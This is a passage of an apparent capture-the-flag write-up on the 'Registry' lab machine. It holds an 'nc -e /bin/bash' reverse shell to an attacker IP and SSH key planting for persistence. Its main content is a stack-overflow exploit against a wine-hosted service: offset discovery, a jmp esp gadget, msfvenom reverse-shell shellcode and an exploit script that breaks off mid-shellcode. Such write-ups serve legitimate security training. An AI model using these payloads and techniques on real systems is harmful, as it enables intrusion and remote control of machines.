src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158500.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240422192540842\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743gato<\/h3>\n<h4>\u4fe1\u606f\u641c\u96c6\u4e0e\u6d4b\u8bd5<\/h4>\n<p>\u91cd\u65b0\u6539\u5584\u4e00\u4e0b\u73af\u5883\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/tmp$ python3 exp.py \n[+] Starting local process &#039;\/opt\/others\/program&#039;: pid 1980\n[*] Switching to interactive mode\n$ nc -e \/bin\/bash 192.168.0.143 2345\nstty: &#039;standard input&#039;: Inappropriate ioctl for device<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ sudo pwncat-cs -lp 2345 2&gt;\/dev\/null \n[sudo] password for kali: \n[07:23:14] Welcome to pwncat \ud83d\udc08!                                                                                               \n(remote) cxdxnt@registry:\/tmp$ whoami;id\ncxdxnt\nuid=1002(cxdxnt) gid=33(www-data) groups=33(www-data)\n(remote) cxdxnt@registry:\/tmp$ cd \/home\/cxdxnt\/\n(remote) cxdxnt@registry:\/home\/cxdxnt$ ls -la\ntotal 28\ndrwxr-x--- 3 cxdxnt cxdxnt 4096 Jul 24  2023 .\ndrwxr-xr-x 5 root   root   4096 Jul 24  2023 ..\nlrwxrwxrwx 1 root   root      9 Jul 24  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 cxdxnt cxdxnt  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 cxdxnt cxdxnt 3771 Jan  6  2022 .bashrc\ndrwx------ 2 cxdxnt cxdxnt 4096 Jul 24  2023 .cache\n-rw-r--r-- 1 cxdxnt cxdxnt  807 Jan  6  2022 .profile\n-rw-rw-r-- 1 cxdxnt cxdxnt   36 Jul 24  2023 user.txt\n(remote) cxdxnt@registry:\/home\/cxdxnt$ sudo -l        \nMatching Defaults entries for cxdxnt on registry:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser cxdxnt may run the following commands on registry:\n    (gato : gato) NOPASSWD: \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n(remote) cxdxnt@registry:\/home\/cxdxnt$ cat user.txt 
\nREGISTRY{4R3_Y0U_R34D1N6_MY_F1L35?}<\/code><\/pre>\n<p>The sudo rule lets cxdxnt run a single Windows binary under wine as gato, without a password. Run it and see what changes:<\/p>\n<pre><code class=\"language-bash\">(remote) cxdxnt@registry:\/tmp$ sudo -u gato \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n0090:err:explorer:initialize_display_settings Failed to query current display settings for L&quot;\\\\\\\\.\\\\DISPLAY1&quot;.\n[+] Listening for connections.<\/code><\/pre>\n<p>It blocks the terminal while it listens. Kill it for now, plant an SSH public key for cxdxnt and open a second session, so that one terminal can run the service while the other inspects it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Registry\/cxdxnt\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Registry\/cxdxnt\nYour public key has been saved in \/home\/kali\/temp\/Registry\/cxdxnt.pub\nThe key fingerprint is:\nSHA256:HPtUvkirzMWBITibhTEV4feC3U5fc8gwi7Y\/IMUiHao kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|    o.+o         |\n|     *  .        |\n|    + +o+o  +    |\n|     =o*oBo+ = . |\n|    o...SoX o = .|\n|    E   .X.* o o |\n|         .O.o    |\n|       o o ..    |\n|        +   ..   
|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ cat cxdxnt.pub            \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCMAkdE5Kc3DxyXRxBPU11aatMs8JR1P3uJ6nOlw0PaNjb5+2GU8tCB1sxh\/4e4Se3WY8cvK6qldrQ3wrsskBHs6N+izIPYMKXNtjOp3g0ulcsSW5LP5Urqi4DmEDBouA542RH9Uz4u3qett\/F1x41HV5wOcXR1ciJ9NvjrZwRyiZNVStHQ1m4imztzx+OHi7ok+5mqgTjerjHOrEgIi08AQXygQOy++zkGeyNnAwkczYPsWy89DpqzCsvYSUoYvhjceciUuNWL9v\/b8IWq+Jj7TnCJfEOYzsKNFdzWQAb4BptdhLZBp66\/mn4U6rqpkCUmHw\/x9xaIy0MMU4evWii\/UjNuNN1JTUrXGfGZ+xXjk5JDnhyxTcp1lG+UyIi4hqv6jQzGyp6msoCHfhcMpw465Dv3WGBrj8zSEaefIqIrTlFc9cAudakvbTlvLshiBkMnpcg91\/TIxGSZ0j0ckUaqwfrh0H1Cad52jAO2BK1+Tdn5j1PAjwNRk7Txu48FBIU= kali@kali\n\n(remote) cxdxnt@registry:\/home\/cxdxnt$ mkdir .ssh\n(remote) cxdxnt@registry:\/home\/cxdxnt$ cd .ssh\n(remote) cxdxnt@registry:\/home\/cxdxnt\/.ssh$ echo &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCMAkdE5Kc3DxyXRxBPU11aatMs8JR1P3uJ6nOlw0PaNjb5+2GU8tCB1sxh\/4e4Se3WY8cvK6qldrQ3wrsskBHs6N+izIPYMKXNtjOp3g0ulcsSW5LP5Urqi4DmEDBouA542RH9Uz4u3qett\/F1x41HV5wOcXR1ciJ9NvjrZwRyiZNVStHQ1m4imztzx+OHi7ok+5mqgTjerjHOrEgIi08AQXygQOy++zkGeyNnAwkczYPsWy89DpqzCsvYSUoYvhjceciUuNWL9v\/b8IWq+Jj7TnCJfEOYzsKNFdzWQAb4BptdhLZBp66\/mn4U6rqpkCUmHw\/x9xaIy0MMU4evWii\/UjNuNN1JTUrXGfGZ+xXjk5JDnhyxTcp1lG+UyIi4hqv6jQzGyp6msoCHfhcMpw465Dv3WGBrj8zSEaefIqIrTlFc9cAudakvbTlvLshiBkMnpcg91\/TIxGSZ0j0ckUaqwfrh0H1Cad52jAO2BK1+Tdn5j1PAjwNRk7Txu48FBIU= kali@kali&#039; &gt; authorized_keys<\/code><\/pre>\n<p>Then connect over SSH with the private key. <code>chmod 600<\/code> on the key file is required, otherwise the client refuses to use it; sshd&#039;s StrictModes accepts the <code>.ssh<\/code> directory and <code>authorized_keys<\/code> created above because neither is group- or world-writable. Note that the target now answers on 192.168.0.115 rather than the 192.168.0.153 scanned earlier:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ chmod 600 cxdxnt     \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ssh -i cxdxnt cxdxnt@192.168.0.115\nThe authenticity of host &#039;192.168.0.115 (192.168.0.115)&#039; can&#039;t be established.\nED25519 key fingerprint is 
SHA256:qVm+t\/pt+frW8U73aQ2IFTgQXqNWLdYL9gIsVXVMtQM.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.115&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.2 LTS (GNU\/Linux 5.15.0-76-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\nThis system has been minimized by removing packages and content that are\nnot required on a system that users do not log into.\n\nTo restore this content, you can run the &#039;unminimize&#039; command.\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\n\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\n\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2557 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2557    \u2588\u2588\u2551   \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u255a\u2588\u2588\u2588\u2588\u2554\u255d\n\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u255a\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2550\u2550\u2550\u2588\u2588\u2557   \u2588\u2588\u2551   \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557  
\u255a\u2588\u2588\u2554\u255d\n\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d   \u2588\u2588\u2551   \u2588\u2588\u2551  \u2588\u2588\u2551   \u2588\u2588\u2551\n\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d    \u255a\u2550\u255d   \u255a\u2550\u255d  \u255a\u2550\u255d   \u255a\u2550\u255d\n\nLast login: Mon Jul 24 05:55:51 2023 from 192.168.100.85\ncxdxnt@registry:~$ <\/code><\/pre>\n<p>Start the sudo program again in one session and, from the other, check what changed. A new socket is listening:<\/p>\n<pre><code class=\"language-bash\">cxdxnt@registry:~$ ss -tnlup\nNetid        State         Recv-Q        Send-Q                        Local Address:Port                  Peer Address:Port        Process        \nudp          UNCONN        0             0                             127.0.0.53%lo:53                         0.0.0.0:*                          \nudp          UNCONN        0             0                      192.168.0.115%enp0s3:68                         0.0.0.0:*                          \ntcp          LISTEN        0             4096                          127.0.0.53%lo:53                         0.0.0.0:*                          \ntcp          LISTEN        0             128                                 0.0.0.0:22                         0.0.0.0:*                          \ntcp          LISTEN        0             4096                                0.0.0.0:42424                      0.0.0.0:*                          \ntcp          LISTEN        0             128                                    [::]:22                            [::]:*                          \ntcp          LISTEN        0             511                                       *:80                  
             *:*                          <\/code><\/pre>\n<p>The program listens on TCP <code>42424<\/code>, bound to 0.0.0.0, so it is reachable from the attacking machine. Connect to it, see how it reacts to a command, and then send an oversized line:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ nc 192.168.0.115 42424            \nwhoami;id\nERROR whoami;id...\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<\/code><\/pre>\n<p>The connection drops by itself. Back in the session running the service, wine has caught the crash:<\/p>\n<pre><code class=\"language-bash\">cxdxnt@registry:~$ sudo -u gato \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n0044:err:explorer:initialize_display_settings Failed to query current display settings 
for L&quot;\\\\\\\\.\\\\DISPLAY1&quot;.\n0044:err:ole:start_rpcss Failed to open service manager\n[+] Listening for connections.\nReceived connection from remote host.\nConnection handed off to handler thread.\nBytes received: 10\nBytes sent: 19\nBytes received: 1221\nsend failed: 10038\nwine: Unhandled page fault on read access to 61616161 at address 61616161 (thread 00d0), starting debugger...\n00d8:err:winediag:nodrv_CreateWindow Application tried to create a window, but no driver could be loaded.\n00d8:err:winediag:nodrv_CreateWindow Make sure that your X server is running and that $DISPLAY is set correctly.\nUnhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).\nRegister dump:\n CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063\n EIP:61616161 ESP:008d19a4 EBP:61616161 EFLAGS:00010286(  R- --  I S - -P- )\n EAX:ffffffff EBX:00114200 ECX:008d1904 EDX:3ffd2000\n ESI:006b04d8 EDI:00000000\nStack dump:\n0x008d19a4:  61616161 61616161 61616161 61616161\n0x008d19b4:  61616161 61616161 61616161 61616161\n0x008d19c4:  61616161 61616161 61616161 61616161\n0x008d19d4:  61616161 61616161 61616161 61616161\n0x008d19e4:  61616161 61616161 61616161 61616161\n0x008d19f4:  61616161 61616161 61616161 61616161\nBacktrace:\n=&gt;0 0x61616161 (0x61616161)\n0x61616161: -- no code accessible --\nModules:\nModule  Address                 Debug info      Name (12 modules)\nPE       8040000- 8048000       Deferred        myfirstprogram\nPE      61f80000-61f90000       Deferred        api-ms-win-crt-math-l1-1-0\nPE      63740000-6374e000       Deferred        api-ms-win-crt-runtime-l1-1-0\nPE      66600000-6660d000       Deferred        api-ms-win-crt-locale-l1-1-0\nPE      6b7c0000-6b7ce000       Deferred        api-ms-win-crt-stdio-l1-1-0\nPE      6ca00000-6ca0d000       Deferred        api-ms-win-crt-heap-l1-1-0\nPE      70240000-70256000       Deferred        vcruntime140\nPE      70b40000-70df9000       Deferred        ucrtbase\nPE      
7b000000-7b348000       Deferred        kernelbase\nPE      7b600000-7b929000       Deferred        kernel32\nPE      7bc00000-7bea9000       Deferred        ntdll\nPE      7fdd0000-7fdd6000       Deferred        ws2_32\nThreads:\nprocess  tid      prio (all id:s are in hex)\n00000020 (D) Z:\\opt\\projects\\MyFirstProgram.exe\n        00000024    0\n        000000d0    0 &lt;==\n        000000dc    0\n00000038 services.exe\n        0000003c    0\n        0000004c    0\n        00000058    0\n        00000078    0\n        00000090    0\n        0000009c    0\n        000000bc    0\n00000040 explorer.exe\n        00000044    0\n        00000048    0\n00000050 winedevice.exe\n        00000054    0\n        00000060    0\n        00000064    0\n        00000068    0\n00000070 plugplay.exe\n        00000074    0\n        0000007c    0\n        00000080    0\n        00000084    0\n        000000a4    0\n00000088 winedevice.exe\n        0000008c    0\n        00000094    0\n        00000098    0\n        000000a0    0\n        000000b0    0\n000000b4 svchost.exe\n        000000b8    0\n        000000c0    0\n        000000c4    0\n000000c8 conhost.exe\n        000000cc    0\nSystem information:\n    Wine build: wine-6.0.3 (Ubuntu 6.0.3~repack-1)\n    Platform: i386\n    Version: Windows 7\n    Host system: Linux\n    Host version: 5.15.0-76-generic<\/code><\/pre>\n<p>This is a classic stack overflow: EIP is 0x61616161 (<code>aaaa<\/code>), so is EBP, and every word at ESP is 0x61616161, which means the saved return address is under our control and ESP points into our own data. The module list also shows the executable mapped at 0x8040000-0x8048000, a fixed base we can take addresses from. Since the program is a Windows PE running under <code>wine<\/code>, copy it to a local machine for debugging.<\/p>\n<pre><code class=\"language-bash\">hgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ file MyFirstProgram.exe\nMyFirstProgram.exe: PE32 executable (console) Intel 80386, for MS Windows<\/code><\/pre>\n<p>Before debugging, check whether it is packed:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158501.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158501.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705204649217\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Finding the offset<\/h4>\n<p>Generate a cyclic pattern to measure the distance to the saved return address:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ locate pattern_create\n\/usr\/bin\/msf-pattern_create\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ \/usr\/bin\/msf-pattern_create -l 200 \nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag<\/code><\/pre>\n<p>I used <code>ollydbg<\/code> and fed it the pattern to read the offset at the crash. (My machine could not deliver the input and I may need a different environment, so for now I reuse the value already available.) Following the write-up I was working from, the final EIP is <code>39654138<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msf-pattern_offset -q 39654138\n[*] 
Exact match at offset 146<\/code><\/pre>\n<p>0x39654138 is the little-endian reading of the ASCII bytes <code>8Ae9<\/code>, which the pattern places 146 bytes in, so the saved return address starts at offset 146 of the line.<\/p>\n<h4>Finding a jmp esp gadget<\/h4>\n<p>At the crash ESP pointed into our own bytes, so a <code>jmp esp<\/code> inside the executable itself (mapped at the fixed 0x8040000 base seen in the crash dump) is enough to land in shellcode placed right after the return address:<\/p>\n<pre><code class=\"language-bash\">hgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ ropper --file MyFirstProgram.exe --search &quot;jmp esp;&quot;\n[INFO] Load gadgets for section: .text\n[LOAD] loading... 100%\n[LOAD] removing double gadgets... 100%\n[INFO] Searching for gadgets: jmp esp;\n\n[INFO] File: MyFirstProgram.exe\n0x080414c3: jmp esp;\n# 0x080414c3 -&gt; little-endian on the wire: \\xc3\\x14\\x04\\x08 (contains neither \\x00 nor \\x0a)<\/code><\/pre>\n<h4>Generating the shellcode<\/h4>\n<p>Generate a reverse shell encoded to avoid the two bad bytes, <code>\\x00<\/code> and <code>\\x0a<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msfvenom -p windows\/shell_reverse_tcp LHOST=192.168.0.143 LPORT=3456 EXITFUNC=thread -b &quot;\\x00\\x0a&quot; -a x86 -f python -v shellcode\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\nFound 11 compatible encoders\nAttempting to encode payload with 1 iterations of x86\/shikata_ga_nai\nx86\/shikata_ga_nai succeeded with size 351 (iteration=0)\nx86\/shikata_ga_nai chosen with final size 351\nPayload size: 351 bytes\nFinal size of python file: 1965 bytes\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xbe\\xca\\x1a\\x7b\\x95\\xdb\\xcf\\xd9\\x74\\x24\\xf4&quot;\nshellcode += b&quot;\\x58\\x31\\xc9\\xb1\\x52\\x83\\xc0\\x04\\x31\\x70\\x0e&quot;\nshellcode += b&quot;\\x03\\xba\\x14\\x99\\x60\\xc6\\xc1\\xdf\\x8b\\x36\\x12&quot;\nshellcode += b&quot;\\x80\\x02\\xd3\\x23\\x80\\x71\\x90\\x14\\x30\\xf1\\xf4&quot;\nshellcode += b&quot;\\x98\\xbb\\x57\\xec\\x2b\\xc9\\x7f\\x03\\x9b\\x64\\xa6&quot;\nshellcode += b&quot;\\x2a\\x1c\\xd4\\x9a\\x2d\\x9e\\x27\\xcf\\x8d\\x9f\\xe7&quot;\nshellcode += b&quot;\\x02\\xcc\\xd8\\x1a\\xee\\x9c\\xb1\\x51\\x5d\\x30\\xb5&quot;\nshellcode += b&quot;\\x2c\\x5e\\xbb\\x85\\xa1\\xe6\\x58\\x5d\\xc3\\xc7\\xcf&quot;\nshellcode += b&quot;\\xd5\\x9a\\xc7\\xee\\x3a\\x97\\x41\\xe8\\x5f\\x92\\x18&quot;\nshellcode += 
b&quot;\\x83\\x94\\x68\\x9b\\x45\\xe5\\x91\\x30\\xa8\\xc9\\x63&quot;\nshellcode += b&quot;\\x48\\xed\\xee\\x9b\\x3f\\x07\\x0d\\x21\\x38\\xdc\\x6f&quot;\nshellcode += b&quot;\\xfd\\xcd\\xc6\\xc8\\x76\\x75\\x22\\xe8\\x5b\\xe0\\xa1&quot;\nshellcode += b&quot;\\xe6\\x10\\x66\\xed\\xea\\xa7\\xab\\x86\\x17\\x23\\x4a&quot;\nshellcode += b&quot;\\x48\\x9e\\x77\\x69\\x4c\\xfa\\x2c\\x10\\xd5\\xa6\\x83&quot;\nshellcode += b&quot;\\x2d\\x05\\x09\\x7b\\x88\\x4e\\xa4\\x68\\xa1\\x0d\\xa1&quot;\nshellcode += b&quot;\\x5d\\x88\\xad\\x31\\xca\\x9b\\xde\\x03\\x55\\x30\\x48&quot;\nshellcode += b&quot;\\x28\\x1e\\x9e\\x8f\\x4f\\x35\\x66\\x1f\\xae\\xb6\\x97&quot;\nshellcode += b&quot;\\x36\\x75\\xe2\\xc7\\x20\\x5c\\x8b\\x83\\xb0\\x61\\x5e&quot;\nshellcode += b&quot;\\x03\\xe0\\xcd\\x31\\xe4\\x50\\xae\\xe1\\x8c\\xba\\x21&quot;\nshellcode += b&quot;\\xdd\\xad\\xc5\\xeb\\x76\\x47\\x3c\\x7c\\xb9\\x30\\x3e&quot;\nshellcode += b&quot;\\xf3\\x51\\x43\\x3e\\x06\\x22\\xca\\xd8\\x72\\x32\\x9b&quot;\nshellcode += b&quot;\\x73\\xeb\\xab\\x86\\x0f\\x8a\\x34\\x1d\\x6a\\x8c\\xbf&quot;\nshellcode += b&quot;\\x92\\x8b\\x43\\x48\\xde\\x9f\\x34\\xb8\\x95\\xfd\\x93&quot;\nshellcode += b&quot;\\xc7\\x03\\x69\\x7f\\x55\\xc8\\x69\\xf6\\x46\\x47\\x3e&quot;\nshellcode += b&quot;\\x5f\\xb8\\x9e\\xaa\\x4d\\xe3\\x08\\xc8\\x8f\\x75\\x72&quot;\nshellcode += b&quot;\\x48\\x54\\x46\\x7d\\x51\\x19\\xf2\\x59\\x41\\xe7\\xfb&quot;\nshellcode += b&quot;\\xe5\\x35\\xb7\\xad\\xb3\\xe3\\x71\\x04\\x72\\x5d\\x28&quot;\nshellcode += b&quot;\\xfb\\xdc\\x09\\xad\\x37\\xdf\\x4f\\xb2\\x1d\\xa9\\xaf&quot;\nshellcode += b&quot;\\x03\\xc8\\xec\\xd0\\xac\\x9c\\xf8\\xa9\\xd0\\x3c\\x06&quot;\nshellcode += b&quot;\\x60\\x51\\x5c\\xe5\\xa0\\xac\\xf5\\xb0\\x21\\x0d\\x98&quot;\nshellcode += b&quot;\\x42\\x9c\\x52\\xa5\\xc0\\x14\\x2b\\x52\\xd8\\x5d\\x2e&quot;\nshellcode += b&quot;\\x1e\\x5e\\x8e\\x42\\x0f\\x0b\\xb0\\xf1\\x30\\x1e&quot;<\/code><\/pre>\n<ul>\n<li><code>-p windows\/shell_reverse_tcp<\/code>: 
the payload to generate: a Windows reverse TCP shell. When the target executes it, it connects back to the given address and port and hands the attacker a cmd.exe command shell.<\/li>\n<li><code>LHOST<\/code>: the listener host, i.e. the IP address the shell connects back to.<\/li>\n<li><code>LPORT<\/code>: the listener port the shell connects back to.<\/li>\n<li><code>EXITFUNC=thread<\/code>: how the payload exits when the shell closes. <code>thread<\/code> calls ExitThread rather than ExitProcess, so only the handler thread dies and the listening process stays up. That matters here because the service hands each connection off to a handler thread.<\/li>\n<li><code>-b &quot;\\x00\\x0a&quot;<\/code>: bytes the encoder must avoid (&quot;bad chars&quot;). <code>\\x00<\/code> terminates C strings and would truncate the payload on copy; <code>\\x0a<\/code> is a newline, which a line-oriented server like this one treats as the end of input, so nothing after it would reach the buffer.<\/li>\n<li><code>-a x86<\/code>: target architecture. The binary is PE32 for Intel 80386, so the payload must be 32-bit x86 rather than x64.<\/li>\n<li><code>-f python<\/code>: output format. The shellcode is emitted as Python byte-string assignments ready to paste into the exploit.<\/li>\n<li><code>-v shellcode<\/code>: in msfvenom, <code>-v<\/code> is <code>--var-name<\/code>, the variable name used in the generated output. That is why the listing reads <code>shellcode = b&quot;&quot;<\/code> instead of the default <code>buf<\/code>; the Linux payload generated later without <code>-v<\/code> comes out as <code>buf<\/code>.<\/li>\n<\/ul>\n<h4>Writing the exploit<\/h4>\n<p>Put the pieces together: 146 bytes of padding, the little-endian address of <code>jmp esp<\/code>, a NOP sled, the encoded shellcode, and a line terminator so the service&#039;s read completes:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((&quot;192.168.0.115&quot;, 42424))\n\noffset = 146                     # bytes up to the saved return address\njunk = b&#039;A&#039; * offset\njmp_addr = b&quot;\\xc3\\x14\\x04\\x08&quot;   # 0x080414c3 jmp esp, little-endian, no bad bytes\nnops = b&quot;\\x90&quot; * 100             # sled: after ret, ESP points just past jmp_addr\n\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xbe\\xca\\x1a\\x7b\\x95\\xdb\\xcf\\xd9\\x74\\x24\\xf4&quot;\nshellcode += b&quot;\\x58\\x31\\xc9\\xb1\\x52\\x83\\xc0\\x04\\x31\\x70\\x0e&quot;\nshellcode += 